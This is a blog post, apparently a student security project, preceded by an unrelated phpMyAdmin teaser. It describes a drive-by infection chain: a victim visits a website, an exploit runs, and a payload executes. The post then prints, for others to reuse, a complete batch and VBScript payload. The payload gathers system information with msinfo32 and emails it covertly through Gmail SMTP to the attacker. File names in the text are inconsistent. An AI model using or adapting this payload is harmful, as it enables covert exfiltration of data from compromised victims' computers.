This time we will be trying to integrate Phpmyadmin with Nginx and MariaDB. We are using Arch Linux since its my preferred distribution, but all of these commands are not very specific to the distribution you choose to work with. PhpMyAdmin is one of the most famous tools for managing the MySQL database, and is…
Send email with information about infected computer
So, now that I have everything up and running, its time for the fun to begin. Since I only know a bit java and python I decided to try some bash since it seemed to fit better in the project.
Started by brainstorming , trying to figure out what I wanted my script to do. This is where the planning comes into account and lets you make decisions quickly. My use-case diagram clearly states that my program should send a email with information about infected computer. After this it was easy to decide that this was the goto plan since it was already included in my system design. My design will send email with information about infected computer in 4 steps :
- Computer is browsing to my website
- The exploit is being run and the computer gets infected
- The payload is delivered and the code will run.
- A email is sent to a email account with a file attached that provide information about the infected computer
I remembered that in 1st semester we tried to send emails using telnet. So this was my choice in the beginning. After searching around on Google, it seem that everybody was giving the same advice. Batch is not good at working together with telnet.
This was kinda a killer for me, since I know of no other way to automated the process of sending emails. Luckily I found a script written half in batch and half in visual basic. I didn’t know visual basic, but could read the code well enough to edit it to do exactly what I wanted it to do. I’ve included the code here if other people want to take advantage of it some day.
@echo off setlocal :: defaults set From= set To= set Subj="Computer added %date% %time%" set Body="New computer added %date% %time%" set Serv=smtp.gmail.com set Auth=#### set Pass=######### set fileattach=C:sysinfo.txt start /WAIT msinfo32 /report C:sysinfo.txt call :createVBS "email-bat.vbs" call :send %From% %To% %Subj% %Body% %Serv% %Auth% %Pass% pause del "%vbsfile%" 2>nul goto :EOF :send cscript.exe /nologo "%vbsfile%" %1 %2 %3 %4 %5 %6 %7 >nul 2>nul goto :EOF :createVBS set "vbsfile=%~1" del "%vbsfile%" 2>nul set cdoSchema=http://schemas.microsoft.com/cdo/configuration echo >>"%vbsfile%" Set objArgs = WScript.Arguments echo >>"%vbsfile%" Set objEmail = CreateObject("CDO.Message") echo >>"%vbsfile%" objEmail.From = objArgs(0) echo >>"%vbsfile%" objEmail.To = objArgs(1) echo >>"%vbsfile%" objEmail.Subject = objArgs(2) echo >>"%vbsfile%" objEmail.Textbody = objArgs(3) if defined fileattach echo >>"%vbsfile%" objEmail.AddAttachment "%fileattach%" echo >>"%vbsfile%" with objEmail.Configuration.Fields echo >>"%vbsfile%" .Item ("%cdoSchema%/sendusing") = 2 ' not local, smtp echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpserver") = objArgs(4) echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpserverport") = 465 echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpauthenticate") = 1 ' cdobasic echo >>"%vbsfile%" .Item ("%cdoSchema%/sendusername") = objArgs(5) echo >>"%vbsfile%" .Item ("%cdoSchema%/sendpassword") = objArgs(6) echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpusessl") = True echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpconnectiontimeout") = 25 echo >>"%vbsfile%" .Update echo >>"%vbsfile%" end with echo >>"%vbsfile%" objEmail.Send rem
This code generates a txt file called systeminfo.txt and places it in C:systeminfo.txt and than waits
The way it works is that the script calls a program in windows xp called “msinfo32” this small program ships with window xp and is normally used by Microsoft to generate information about the system used for testing or support purposes. After this file is generated the script checks if there is a file in place called “systeminfo.txt” and if there is it will continue with the email part.
I login with my email information and tells it to use the google smtp to send my email to myself with the txt attached.